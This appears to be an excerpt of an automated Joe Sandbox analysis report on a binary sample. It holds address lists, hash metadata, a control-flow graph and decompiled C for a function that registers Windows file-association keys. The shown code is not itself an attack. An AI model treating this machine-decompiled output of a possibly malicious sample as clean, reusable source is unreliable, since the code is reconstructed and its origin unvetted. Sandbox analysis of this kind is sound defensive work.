                  0x0041132b
                  0x0041132c
                  0x0041132f
                  0x00411333
                  0x00000000
                  0x00000000
                  0x00411342
                  0x00411346
                  0x00000000
                  0x00000000
                  0x0041134d
                  0x00411303
                  0x00411303
                  0x00411305
                  0x00000000
                  0x00000000
                  0x00411350
                  0x00411358
                  0x0041135b
                  0x0041135e
                  0x00411362
                  0x00411365
                  0x0041136a
                  0x0041136c
                  0x00411370
                  0x00411374
                  0x00411377
                  0x0041137c
                  0x0041137e
                  0x00411380
                  0x00411383
                  0x00411385
                  0x0041138a
                  0x0041138d
                  0x00411392
                  0x00411394
                  0x00411396
                  0x00411396
                  0x00411394
                  0x00411399
                  0x00411399
                  0x0041139c
                  0x0041139d
                  0x0041139e
                  0x004113a1
                  0x004113a2
                  0x004113a4
                  0x004113a6
                  0x004113aa
                  0x004113aa
                  0x004113aa
                  0x004113ae
                  0x004113b1
                  0x004113b4
                  0x004113b8
                  0x00000000
                  0x00000000
                  0x004113ce
                  0x004113d6
                  0x004113d9
                  0x004113dc
                  0x004113df
                  0x004113e2
                  0x004113e3
                  0x004113e5
                  0x004113e9
                  0x004113eb
                  0x004113ef
                  0x004113bd
                  0x004113bd
                  0x004113c0
                  0x004113c4
                  0x00000000
                  0x00000000
                  0x004113f4
                  0x004113f7
                  0x004113f7
                  0x004113fa
                  0x004113fc
                  0x00000000
                  0x00000000
                  0x0041140e
                  0x00411411
                  0x00411412
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00411421
                  0x00411422
                  0x00411425
                  0x00411401
                  0x00411401
                  0x00411402
                  0x00411338
                  0x00411338
                  0x00411339
                  0x0041133b
                  0x00000000
                  0x00000000
                  0x00411640
                  0x00000000
                  0x00000000
                  0x0041142a
                  0x00000000
                  0x00000000
                  0x00411436
                  0x00411438
                  0x00000000
                  0x00000000
                  0x0041143f
                  0x00411442
                  0x00411442
                  0x00411445
                  0x00411446
                  0x00000000
                  0x00000000
                  0x00411456
                  0x00411457
                  0x00000000
                  0x00000000
                  0x0041145c
                  0x0041145e
                  0x0041145e
                  0x00411461
                  0x00411462
                  0x00000000
                  0x00000000
                  0x0041131b
                  0x00000000
                  0x00000000
                  0x00411311
                  0x00411313
                  0x00000000
                  0x00000000
                  0x0041147a
                  0x00411481
                  0x00411482
                  0x00411484
                  0x00411487
                  0x00411487
                  0x00411487
                  0x00000000
                  0x00000000
                  0x00411490
                  0x00000000
                  0x00000000
                  0x0041149b
                  0x00000000
                  0x00000000
                  0x004114a4
                  0x004114a8
                  0x004114a9
                  0x004114ac
                  0x004114b0
                  0x00000000
                  0x00000000
                  0x004114b7
                  0x00000000
                  0x00000000
                  0x004114c1
                  0x004114ba
                  0x004114ba
                  0x00411495
                  0x00411495
                  0x00000000
                  0x00000000
                  0x004114c4
                  0x004114c6
                  0x004114c6
                  0x004114c9
                  0x004114ca
                  0x00000000
                  0x00000000
                  0x004114d8
                  0x004114db
                  0x004114de
                  0x004114e1
                  0x004114cd
                  0x004114cd
                  0x004114d1
                  0x00000000
                  0x00000000
                  0x004114e4
                  0x004114e8
                  0x00000000
                  0x00000000
                  0x004114f2
                  0x004114f5
                  0x004114f5
                  0x004114f8
                  0x004114fa
                  0x00000000
                  0x00000000
                  0x00411506
                  0x00411509
                  0x0041150c
                  0x0041150f
                  0x00411512
                  0x00411515
                  0x00411518
                  0x0041151b
                  0x0041152f
                  0x00411530
                  0x00000000
                  0x00411530
                  0x00411523
                  0x00411524
                  0x00411527
                  0x00000000
                  0x00000000
                  0x00411536
                  0x0041142d
                  0x0041142d
                  0x0041142f
                  0x00000000
                  0x00000000
                  0x0041153c
                  0x0041153d
                  0x00411540
                  0x00411542
                  0x00000000
                  0x00000000
                  0x004112ea
                  0x004112ed
                  0x004112f0
                  0x004112f3
                  0x004112f4
                  0x004112f4
                  0x00000000
                  0x00000000
                  0x00411549
                  0x0041154c
                  0x0041154d
                  0x004114ff
                  0x004114ff
                  0x00411500
                  0x0041148a
                  0x0041148a
                  0x00000000
                  0x00000000
                  0x00411552
                  0x00411555
                  0x00411558
                  0x0041155b
                  0x00411465
                  0x00411465
                  0x00411466
                  0x00411469
                  0x00411469
                  0x0041146b
                  0x00000000
                  0x00000000
                  0x00411561
                  0x00411564
                  0x00411567
                  0x0041156a
                  0x0041156b
                  0x0041156f
                  0x00411572
                  0x00411573
                  0x00411577
                  0x00411578
                  0x0041157a
                  0x0041157c
                  0x00411130
                  0x00411130
                  0x00411132
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00411584
                  0x00411587
                  0x0041158a
                  0x0041158d
                  0x0041158e
                  0x00411592
                  0x00411595
                  0x00411596
                  0x0041159a
                  0x0041159b
                  0x0041159d
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004115a4
                  0x004115a6
                  0x004115a8
                  0x004115ab
                  0x004115ad
                  0x00000000
                  0x00000000
                  0x004112d4
                  0x004112d4
                  0x004112db
                  0x004112e0
                  0x004112e0
                  0x00000000
                  0x00000000
                  0x004115b9
                  0x00411320
                  0x00411320
                  0x00411641
                  0x00411641
                  0x00000000
                  0x00000000
                  0x004115c9
                  0x00000000
                  0x00000000
                  0x004115cf
                  0x004115d3
                  0x00000000
                  0x00000000
                  0x004115dd
                  0x004115e0
                  0x004115e1
                  0x004115e3
                  0x004115e6
                  0x004115e8
                  0x004115ee
                  0x004115ef
                  0x004115ef
                  0x004115f4
                  0x004115f8
                  0x00000000
                  0x00000000
                  0x00411607
                  0x0041160b
                  0x0041144a
                  0x0041144a
                  0x00411644
                  0x00411644
                  0x00411646
                  0x00000000
                  0x00000000
                  0x00411611
                  0x00411614
                  0x00411617
                  0x0041161a
                  0x0041161b
                  0x0041161f
                  0x00411622
                  0x00411623
                  0x004115fd
                  0x004115fd
                  0x00000000
                  0x00000000
                  0x00411629
                  0x0041162c
                  0x0041162f
                  0x00411632
                  0x00411633
                  0x00411637
                  0x0041163a
                  0x0041163b
                  0x004115fe
                  0x004115fe
                  0x00411600
                  0x00000000
                  0x00000000
                  0x00411277
                  0x004112c5
                  0x004112c8
                  0x004112c8
                  0x004112c8
                  0x004112cf
                  0x00000000
                  0x004112cf
                  0x004111f7
                  0x004111f9
                  0x004111fc
                  0x00000000
                  0x00000000
                  0x004111fe
                  0x00411204
                  0x00411207
                  0x0041120c
                  0x0041120e
                  0x00000000
                  0x00000000
                  0x00411214
                  0x0041121b
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0041121d
                  0x00411175
                  0x00411179
                  0x00000000
                  0x00000000
                  0x0041117b
                  0x00411181
                  0x0041118b
                  0x0041118b
                  0x00411191
                  0x0041119b
                  0x004111a1
                  0x004111a4
                  0x00000000
                  0x00000000
                  0x004111a6
                  0x004111b4
                  0x004111ba
                  0x004111bc
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004111bc
                  0x00411193
                  0x00411199
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00411199
                  0x00411183
                  0x00411189
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0041115a
                  0x00411165
                  0x0041116a
                  0x0041116c
                  0x00411102
                  0x00411102
                  0x00411666
                  0x00411666
                  0x0041166b
                  0x00411670
                  0x00411670
                  0x00411672
                  0x00411679
                  0x00411680
                  0x004112e2
                  0x004112e7
                  0x004112e7
                  0x00000000
                  0x0041116c
                  0x00411158
                  0x00411113
                  0x00411116
                  0x00411118
                  0x00000000
                  0x00000000
                  0x00411123
                  0x00411124
                  0x00411125
                  0x0041112a
                  0x00000000
                  0x0041112a
                  0x004110ec
                  0x004110f1
                  0x004110fc
                  0x00000000
                  0x00000000
                  0x00000000

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3
                  • String ID:
                  • API String ID: 431132790-0
                  • Opcode ID: 5581757f2f0f604347708a168a423f3eb4049c49235fdbbd8d9b4c50d54d3b50
                  • Instruction ID: 5d7ebeb502aa4d7c5eabf293e969739ff04ac9ecbf51b97e95c40226f3c0dc1a
                  • Opcode Fuzzy Hash: 5581757f2f0f604347708a168a423f3eb4049c49235fdbbd8d9b4c50d54d3b50
                  • Instruction Fuzzy Hash: 58F19270600219EFDB14DF55C880EFF7BA9EF08314F10851AFA19AB2A1D739D981DB69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00403470, Relevance: .1, Instructions: 101COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 64a287c661e92ed1438a514a83cfe0340e7efc95c2e7fd8bcbceb930b074e31f
                  • Instruction ID: fa1582bb37753461351b5195b8140c6b020d445a1faa5dbebd4059a3001eec0c
                  • Opcode Fuzzy Hash: 64a287c661e92ed1438a514a83cfe0340e7efc95c2e7fd8bcbceb930b074e31f
                  • Instruction Fuzzy Hash: ED314632B10A250BE704CE6D9C5172A76829BC8255F58433DED2AEF3C7DE38DE01D284
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00427ACD, Relevance: 33.6, APIs: 3, Strings: 16, Instructions: 389windowCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 0 427acd-427b14 call 431a9b call 4014c0 * 2 call 41f363 call 4292e7 11 427fb7-427fd2 call 4010b0 * 2 call 431b73 0->11 12 427b1a-427b1d 0->12 14 427b20-427b72 call 408692 call 405562 * 4 12->14 30 427be0-427c0e call 4014c0 * 3 14->30 31 427b74-427b9d call 4014c0 call 41f363 ExtractIconA 14->31 50 427c14-427c1b 30->50 51 427f5c-427f5f 30->51 41 427bb9-427bc6 call 4015a0 31->41 42 427b9f-427bb7 call 4015a0 DestroyCursor 31->42 49 427bc9-427bdb call 405e21 call 4010b0 41->49 42->49 49->30 50->51 53 427c21-427c30 50->53 55 427f62-427f96 call 4010b0 * 5 51->55 61 427c32-427c39 call 4056c2 53->61 62 427c3e-427c4d call 427206 53->62 90 427f99-427f9e call 4010b0 55->90 61->62 69 427c4f-427c73 call 4010b0 * 3 62->69 70 427c9c-427c9e 62->70 98 427c76-427c97 call 4010b0 * 3 69->98 72 427ca0-427cba call 4015a0 call 427206 70->72 73 427ce9-427cf8 70->73 87 427cbf-427cc1 72->87 84 427d32-427d5d call 4015a0 call 427206 73->84 85 427cfa-427d01 73->85 92 427cc3-427ce7 call 4010b0 * 3 84->92 111 427d63-427d65 84->111 85->84 91 427d03-427d12 call 405ec1 85->91 87->73 87->92 105 427fa1-427fb1 call 4010b0 90->105 106 427d18-427d25 call 405ec1 91->106 107 427de9-427e12 call 4015a0 call 427206 91->107 92->98 98->105 105->11 105->14 121 427d2a-427d2d 106->121 132 427e53-427e58 107->132 133 427e14-427e4e call 4010b0 * 5 107->133 117 427d67-427d8d call 4015a0 call 427206 111->117 118 427ddc-427de1 111->118 117->92 142 427d93-427db2 call 4015a0 call 427206 117->142 124 427de4 call 405ec1 118->124 121->124 124->107 137 427eb4-427ec9 132->137 138 427e5a-427e80 call 4015a0 call 427206 132->138 133->90 137->55 149 427ecf-427f03 call 4014f0 call 420018 call 40a356 137->149 138->55 155 427e86-427ea7 call 4015a0 call 427206 138->155 156 427db7-427db9 142->156 175 427f05-427f0c 149->175 176 427f1d-427f2c call 427206 149->176 171 427eac-427eae 155->171 156->92 160 427dbf-427dd7 call 405ec1 * 2 156->160 160->121 171->55 171->137 175->176 178 427f0e-427f1b call 409f00 175->178 176->55 183 427f2e-427f32 176->183 178->55 178->176 183->55 184 427f34-427f55 call 4015a0 call 427206 183->184 188 427f5a 184->188 188->55
                  C-Code - Quality: 90%
                  			E00427ACD(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t148;
				void* _t166;
				void* _t177;
				intOrPtr _t179;
				intOrPtr _t182;
				intOrPtr _t192;
				intOrPtr _t195;
				void* _t197;
				intOrPtr _t198;
				intOrPtr _t200;
				intOrPtr _t204;
				intOrPtr _t205;
				intOrPtr _t208;
				intOrPtr _t211;
				intOrPtr _t219;
				intOrPtr _t222;
				intOrPtr _t225;
				intOrPtr _t230;
				struct HICON__* _t239;
				void* _t240;
				intOrPtr _t247;
				intOrPtr _t248;
				void* _t276;
				void* _t277;
				void* _t294;
				intOrPtr* _t327;
				intOrPtr _t328;
				char* _t329;
				void* _t330;
				void* _t332;
				intOrPtr _t333;
				intOrPtr _t334;
				char* _t335;
				struct HICON__* _t336;
				void* _t338;
				void* _t339;
				void* _t340;
				intOrPtr _t342;

				_t340 = __eflags;
				_t325 = __edx;
				_push(0x3c);
				E00431A9B(E0044C457, __ebx, __edi, __esi);
				_t332 = __ecx;
				E004014C0(_t338 - 0x2c, __edx);
				 *(_t338 - 4) =  *(_t338 - 4) & 0x00000000;
				E004014C0(_t338 - 0x14, __edx);
				 *(_t338 - 4) = 1;
				E004292E7(__ebx, __edx,  *((intOrPtr*)(E0041F363(__ebx, __edi, _t332, _t340) + 8)), _t338 - 0x2c); // executed
				_t148 =  *((intOrPtr*)(_t332 + 8));
				 *((intOrPtr*)(_t338 - 0x3c)) = _t148;
				 *(_t338 - 0x30) = 1;
				if(_t148 == 0) {
					L45:
					E004010B0( *((intOrPtr*)(_t338 - 0x14)) + 0xfffffff0, _t325);
					return E00431B73(E004010B0( &(( *(_t338 - 0x2c))[0xfffffffffffffff0]), _t325));
				} else {
					_t333 = _t332 + 4;
					_t342 = _t333;
					 *((intOrPtr*)(_t338 - 0x40)) = _t333;
					do {
						_t327 =  *((intOrPtr*)(E00408692(_t338 - 0x3c)));
						 *((intOrPtr*)(_t338 - 0x44)) = _t327;
						E00405562(_t338 - 0x24, _t342, _t338 - 0x2c);
						 *(_t338 - 4) = 2;
						E00405562(_t338 - 0x28, _t342, _t338 - 0x2c);
						 *(_t338 - 4) = 3;
						E00405562(_t338 - 0x20, _t342, _t338 - 0x2c);
						 *(_t338 - 4) = 4;
						E00405562(_t338 - 0x38, _t342, _t338 - 0x2c);
						_t247 =  *((intOrPtr*)(_t338 + 8));
						_t343 = _t247;
						if(_t247 != 0) {
							E004014C0(_t338 - 0x34, _t325);
							_t335 =  *(_t338 - 0x2c);
							 *(_t338 - 4) = 6;
							_t239 = ExtractIconA( *(E0041F363(_t247, _t327, _t335, _t343) + 8), _t335,  *(_t338 - 0x30)); // executed
							_t336 = _t239;
							_t240 = _t338 - 0x34;
							if(_t336 == 0) {
								E004015A0(_t240, ",%d", 0);
								_t339 = _t339 + 0xc;
							} else {
								E004015A0(_t240, ",%d",  *(_t338 - 0x30));
								_t339 = _t339 + 0xc;
								DestroyCursor(_t336);
							}
							E00405E21(_t338 - 0x38, _t325,  *((intOrPtr*)(_t338 - 0x34)),  *((intOrPtr*)( *((intOrPtr*)(_t338 - 0x34)) - 0xc)));
							E004010B0( *((intOrPtr*)(_t338 - 0x34)) - 0x10, _t325);
						}
						E004014C0(_t338 - 0x18, _t325);
						E004014C0(_t338 - 0x10, _t325);
						E004014C0(_t338 - 0x1c, _t325);
						 *(_t338 - 4) = 9;
						_t166 =  *((intOrPtr*)( *_t327 + 0x64))(_t338 - 0x10, 5);
						_t334 =  *((intOrPtr*)(_t338 - 0x38));
						if(_t166 == 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t338 - 0x10)) - 0xc)) == 0) {
							_t328 =  *((intOrPtr*)(_t338 - 0x24));
							_t248 =  *((intOrPtr*)(_t338 - 0x28));
							goto L42;
						} else {
							_push(6);
							_push(_t338 - 0x1c);
							if( *((intOrPtr*)( *_t327 + 0x64))() == 0) {
								E004056C2(_t247, _t338 - 0x1c, _t338 - 0x10);
							}
							_t177 = E00427206(_t334,  *((intOrPtr*)(_t338 - 0x10)),  *((intOrPtr*)(_t338 - 0x1c)), 0); // executed
							if(_t177 != 0) {
								__eflags = _t247;
								if(_t247 == 0) {
									L17:
									_t179 =  *((intOrPtr*)( *_t327 + 0x64))(_t338 - 0x14, 0);
									__eflags = _t179;
									if(_t179 == 0) {
										L22:
										_t329 = "ddeexec";
										_push(_t329);
										E004015A0(_t338 - 0x14, "%s\\shell\\open\\%s",  *((intOrPtr*)(_t338 - 0x10)));
										_t339 = _t339 + 0x10;
										_t182 = E00427206(_t334,  *((intOrPtr*)(_t338 - 0x14)), "[open(\"%1\")]", 0); // executed
										__eflags = _t182;
										if(_t182 == 0) {
											L16:
											E004010B0( *((intOrPtr*)(_t338 - 0x1c)) + 0xfffffff0, _t325);
											E004010B0( *((intOrPtr*)(_t338 - 0x10)) + 0xfffffff0, _t325);
											E004010B0( *((intOrPtr*)(_t338 - 0x18)) + 0xfffffff0, _t325);
											_t288 = _t334 - 0x10;
											goto L13;
										}
										__eflags = _t247;
										if(_t247 == 0) {
											_push(" \"%1\"");
											_t294 = _t338 - 0x24;
											L28:
											E00405EC1(_t294);
											L29:
											_push("command");
											E004015A0(_t338 - 0x14, "%s\\shell\\open\\%s",  *((intOrPtr*)(_t338 - 0x10)));
											_t328 =  *((intOrPtr*)(_t338 - 0x24));
											_t339 = _t339 + 0x10;
											_t192 = E00427206(_t334,  *((intOrPtr*)(_t338 - 0x14)), _t328, 0); // executed
											__eflags = _t192;
											if(_t192 != 0) {
												__eflags = _t247;
												_t248 =  *((intOrPtr*)(_t338 - 0x28));
												if(_t247 == 0) {
													L34:
													_t325 = _t338 - 0x18;
													 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t338 - 0x44)))) + 0x64))(_t338 - 0x18, 4);
													_t195 =  *((intOrPtr*)(_t338 - 0x18));
													__eflags =  *((intOrPtr*)(_t195 - 0xc));
													if( *((intOrPtr*)(_t195 - 0xc)) == 0) {
														L42:
														E004010B0( *((intOrPtr*)(_t338 - 0x1c)) + 0xfffffff0, _t325);
														E004010B0( *((intOrPtr*)(_t338 - 0x10)) + 0xfffffff0, _t325);
														E004010B0( *((intOrPtr*)(_t338 - 0x18)) + 0xfffffff0, _t325);
														E004010B0(_t334 - 0x10, _t325);
														__eflags =  *((intOrPtr*)(_t338 - 0x20)) + 0xfffffff0;
														E004010B0( *((intOrPtr*)(_t338 - 0x20)) + 0xfffffff0, _t325);
														_t276 = _t248 - 0x10;
														L43:
														E004010B0(_t276, _t325);
														_t277 = _t328 - 0x10;
														goto L44;
													}
													 *((intOrPtr*)(_t338 - 0x44)) = 0x208;
													_t197 = E004014F0(_t338 - 0x14, 0x208);
													_push(_t338 - 0x44);
													_push(_t197);
													_push( *((intOrPtr*)(_t338 - 0x18)));
													_push(0x80000000); // executed
													_t198 = E00420018(_t248, _t325, _t328, _t334, __eflags); // executed
													 *((intOrPtr*)(_t338 - 0x48)) = _t198;
													E0040A356(_t338 - 0x14, 0xffffffff);
													__eflags =  *((intOrPtr*)(_t338 - 0x48));
													if( *((intOrPtr*)(_t338 - 0x48)) != 0) {
														L38:
														_t200 = E00427206(_t334,  *((intOrPtr*)(_t338 - 0x18)),  *((intOrPtr*)(_t338 - 0x10)), 0); // executed
														__eflags = _t200;
														if(_t200 != 0) {
															__eflags =  *((intOrPtr*)(_t338 + 8));
															if( *((intOrPtr*)(_t338 + 8)) != 0) {
																E004015A0(_t338 - 0x14, "%s\\ShellNew",  *((intOrPtr*)(_t338 - 0x18)));
																_t339 = _t339 + 0xc;
																E00427206(_t334,  *((intOrPtr*)(_t338 - 0x14)), 0x44f0f5, "NullFile"); // executed
															}
														}
														goto L42;
													}
													_t204 =  *((intOrPtr*)(_t338 - 0x14));
													__eflags =  *((intOrPtr*)(_t204 - 0xc));
													if( *((intOrPtr*)(_t204 - 0xc)) == 0) {
														goto L38;
													}
													_t205 = E00409F00(_t338 - 0x14, _t325,  *((intOrPtr*)(_t338 - 0x10)));
													__eflags = _t205;
													if(_t205 != 0) {
														goto L42;
													}
													goto L38;
												}
												_push("command");
												E004015A0(_t338 - 0x14, "%s\\shell\\print\\%s",  *((intOrPtr*)(_t338 - 0x10)));
												_t339 = _t339 + 0x10;
												_t208 = E00427206(_t334,  *((intOrPtr*)(_t338 - 0x14)), _t248, 0); // executed
												__eflags = _t208;
												if(_t208 == 0) {
													goto L42;
												}
												_push("command");
												E004015A0(_t338 - 0x14, "%s\\shell\\printto\\%s",  *((intOrPtr*)(_t338 - 0x10)));
												_t339 = _t339 + 0x10;
												_t211 = E00427206(_t334,  *((intOrPtr*)(_t338 - 0x14)),  *((intOrPtr*)(_t338 - 0x20)), 0); // executed
												__eflags = _t211;
												if(_t211 == 0) {
													goto L42;
												}
												goto L34;
											}
											E004010B0( *((intOrPtr*)(_t338 - 0x1c)) + 0xfffffff0, _t325);
											E004010B0( *((intOrPtr*)(_t338 - 0x10)) + 0xfffffff0, _t325);
											E004010B0( *((intOrPtr*)(_t338 - 0x18)) + 0xfffffff0, _t325);
											E004010B0(_t334 - 0x10, _t325);
											E004010B0( *((intOrPtr*)(_t338 - 0x20)) + 0xfffffff0, _t325);
											_t276 =  *((intOrPtr*)(_t338 - 0x28)) + 0xfffffff0;
											goto L43;
										}
										_push(_t329);
										E004015A0(_t338 - 0x14, "%s\\shell\\print\\%s",  *((intOrPtr*)(_t338 - 0x10)));
										_t339 = _t339 + 0x10;
										_t219 = E00427206(_t334,  *((intOrPtr*)(_t338 - 0x14)), "[print(\"%1\")]", 0); // executed
										__eflags = _t219;
										if(_t219 == 0) {
											goto L16;
										}
										_push(_t329);
										E004015A0(_t338 - 0x14, "%s\\shell\\printto\\%s",  *((intOrPtr*)(_t338 - 0x10)));
										_t339 = _t339 + 0x10;
										_t222 = E00427206(_t334,  *((intOrPtr*)(_t338 - 0x14)), "[printto(\"%1\",\"%2\",\"%3\",\"%4\")]", 0); // executed
										__eflags = _t222;
										if(_t222 == 0) {
											goto L16;
										}
										_t330 = " /dde";
										E00405EC1(_t338 - 0x24, _t330);
										E00405EC1(_t338 - 0x28, _t330);
										_push(_t330);
										L21:
										_t294 = _t338 - 0x20;
										goto L28;
									}
									_t225 =  *((intOrPtr*)(_t338 - 0x14));
									__eflags =  *((intOrPtr*)(_t225 - 0xc));
									if( *((intOrPtr*)(_t225 - 0xc)) == 0) {
										goto L22;
									}
									E00405EC1(_t338 - 0x24, " \"%1\"");
									__eflags = _t247;
									if(_t247 == 0) {
										goto L29;
									}
									E00405EC1(_t338 - 0x28, " /p \"%1\"");
									_push(" /pt \"%1\" \"%2\" \"%3\" \"%4\"");
									goto L21;
								}
								E004015A0(_t338 - 0x14, "%s\\DefaultIcon",  *((intOrPtr*)(_t338 - 0x10)));
								_t339 = _t339 + 0xc;
								_t230 = E00427206(_t334,  *((intOrPtr*)(_t338 - 0x14)), _t334, 0); // executed
								__eflags = _t230;
								if(_t230 != 0) {
									goto L17;
								}
								goto L16;
							} else {
								E004010B0( *((intOrPtr*)(_t338 - 0x1c)) + 0xfffffff0, _t325);
								E004010B0( *((intOrPtr*)(_t338 - 0x10)) + 0xfffffff0, _t325);
								E004010B0( *((intOrPtr*)(_t338 - 0x18)) + 0xfffffff0, _t325);
								_t288 =  *((intOrPtr*)(_t338 - 0x38)) + 0xfffffff0;
								L13:
								E004010B0(_t288, _t325);
								E004010B0( *((intOrPtr*)(_t338 - 0x20)) + 0xfffffff0, _t325);
								E004010B0( *((intOrPtr*)(_t338 - 0x28)) + 0xfffffff0, _t325);
								_t277 =  *((intOrPtr*)(_t338 - 0x24)) + 0xfffffff0;
								goto L44;
							}
						}
						L44:
						 *(_t338 - 4) = 1;
						E004010B0(_t277, _t325);
						 *(_t338 - 0x30) =  *(_t338 - 0x30) + 1;
					} while ( *((intOrPtr*)(_t338 - 0x3c)) != 0);
					goto L45;
				}
			}









































                  0x00427acd
                  0x00427acd
                  0x00427acd
                  0x00427ad4
                  0x00427ad9
                  0x00427ade
                  0x00427ae3
                  0x00427aea
                  0x00427aef
                  0x00427b00
                  0x00427b05
                  0x00427b08
                  0x00427b0b
                  0x00427b14
                  0x00427fb7
                  0x00427fbd
                  0x00427fd2
                  0x00427b1a
                  0x00427b1a
                  0x00427b1a
                  0x00427b1d
                  0x00427b20
                  0x00427b2c
                  0x00427b35
                  0x00427b38
                  0x00427b44
                  0x00427b48
                  0x00427b54
                  0x00427b58
                  0x00427b64
                  0x00427b68
                  0x00427b6d
                  0x00427b70
                  0x00427b72
                  0x00427b77
                  0x00427b7c
                  0x00427b7f
                  0x00427b90
                  0x00427b96
                  0x00427b98
                  0x00427b9d
                  0x00427bc1
                  0x00427bc6
                  0x00427b9f
                  0x00427ba8
                  0x00427bad
                  0x00427bb1
                  0x00427bb1
                  0x00427bd3
                  0x00427bdb
                  0x00427bdb
                  0x00427be3
                  0x00427beb
                  0x00427bf3
                  0x00427c02
                  0x00427c06
                  0x00427c09
                  0x00427c0e
                  0x00427f5c
                  0x00427f5f
                  0x00000000
                  0x00427c21
                  0x00427c23
                  0x00427c28
                  0x00427c30
                  0x00427c39
                  0x00427c39
                  0x00427c46
                  0x00427c4d
                  0x00427c9c
                  0x00427c9e
                  0x00427ce9
                  0x00427cf3
                  0x00427cf6
                  0x00427cf8
                  0x00427d32
                  0x00427d32
                  0x00427d37
                  0x00427d44
                  0x00427d49
                  0x00427d56
                  0x00427d5b
                  0x00427d5d
                  0x00427cc3
                  0x00427cc9
                  0x00427cd4
                  0x00427cdf
                  0x00427ce4
                  0x00000000
                  0x00427ce4
                  0x00427d63
                  0x00427d65
                  0x00427ddc
                  0x00427de1
                  0x00427de4
                  0x00427de4
                  0x00427de9
                  0x00427de9
                  0x00427dfa
                  0x00427dff
                  0x00427e02
                  0x00427e0b
                  0x00427e10
                  0x00427e12
                  0x00427e53
                  0x00427e55
                  0x00427e58
                  0x00427eb4
                  0x00427ebb
                  0x00427ebf
                  0x00427ec2
                  0x00427ec5
                  0x00427ec9
                  0x00427f62
                  0x00427f68
                  0x00427f73
                  0x00427f7e
                  0x00427f86
                  0x00427f8e
                  0x00427f91
                  0x00427f96
                  0x00427f99
                  0x00427f99
                  0x00427f9e
                  0x00000000
                  0x00427f9e
                  0x00427ed8
                  0x00427edb
                  0x00427ee3
                  0x00427ee4
                  0x00427ee5
                  0x00427ee8
                  0x00427eed
                  0x00427ef7
                  0x00427efa
                  0x00427eff
                  0x00427f03
                  0x00427f1d
                  0x00427f25
                  0x00427f2a
                  0x00427f2c
                  0x00427f2e
                  0x00427f32
                  0x00427f40
                  0x00427f45
                  0x00427f55
                  0x00427f55
                  0x00427f32
                  0x00000000
                  0x00427f2c
                  0x00427f05
                  0x00427f08
                  0x00427f0c
                  0x00000000
                  0x00000000
                  0x00427f14
                  0x00427f19
                  0x00427f1b
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00427f1b
                  0x00427e5a
                  0x00427e6b
                  0x00427e70
                  0x00427e79
                  0x00427e7e
                  0x00427e80
                  0x00000000
                  0x00000000
                  0x00427e86
                  0x00427e97
                  0x00427e9c
                  0x00427ea7
                  0x00427eac
                  0x00427eae
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00427eae
                  0x00427e1a
                  0x00427e25
                  0x00427e30
                  0x00427e38
                  0x00427e43
                  0x00427e4b
                  0x00000000
                  0x00427e4b
                  0x00427d67
                  0x00427d74
                  0x00427d79
                  0x00427d86
                  0x00427d8b
                  0x00427d8d
                  0x00000000
                  0x00000000
                  0x00427d93
                  0x00427da0
                  0x00427da5
                  0x00427db2
                  0x00427db7
                  0x00427db9
                  0x00000000
                  0x00000000
                  0x00427dbf
                  0x00427dc8
                  0x00427dd1
                  0x00427dd6
                  0x00427d2a
                  0x00427d2a
                  0x00000000
                  0x00427d2a
                  0x00427cfa
                  0x00427cfd
                  0x00427d01
                  0x00000000
                  0x00000000
                  0x00427d0b
                  0x00427d10
                  0x00427d12
                  0x00000000
                  0x00000000
                  0x00427d20
                  0x00427d25
                  0x00000000
                  0x00427d25
                  0x00427cac
                  0x00427cb1
                  0x00427cba
                  0x00427cbf
                  0x00427cc1
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00427c4f
                  0x00427c55
                  0x00427c60
                  0x00427c6b
                  0x00427c73
                  0x00427c76
                  0x00427c76
                  0x00427c81
                  0x00427c8c
                  0x00427c94
                  0x00000000
                  0x00427c94
                  0x00427c4d
                  0x00427fa1
                  0x00427fa1
                  0x00427fa5
                  0x00427faa
                  0x00427fad
                  0x00000000
                  0x00427b20

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00427AD4
                    • Part of subcall function 004292E7: GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00429312
                    • Part of subcall function 004292E7: GetShortPathNameA.KERNEL32(?,00000000,00000104), ref: 00429329
                  • ExtractIconA.SHELL32(?,?,00000001), ref: 00427B90
                  • DestroyCursor.USER32(00000000), ref: 00427BB1
